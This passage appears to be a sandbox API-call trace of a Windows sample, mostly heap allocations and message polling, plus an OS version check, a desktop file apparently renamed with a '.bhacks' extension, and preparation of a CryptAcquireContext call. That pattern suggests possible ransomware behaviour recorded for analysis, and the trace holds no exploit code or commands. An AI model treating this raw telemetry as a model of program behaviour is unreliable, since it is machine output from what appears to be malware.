lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.653] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.653] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0101.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.654] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/JkNoq.avi.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249d9033, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x249d9033, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24c15251, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi.bhacks", cAlternateFileName="JKNOQA~1.BHA")) returned 0x9a3b80 [0101.654] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0101.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0101.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0101.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.656] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.656] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.656] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.656] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0101.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.665] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0101.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.665] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.665] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0101.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.666] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0101.666] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.666] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.667] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.667] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0101.667] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.667] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0101.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.668] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0101.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0101.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.668] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.668] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.668] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.668] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.668] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0101.669] 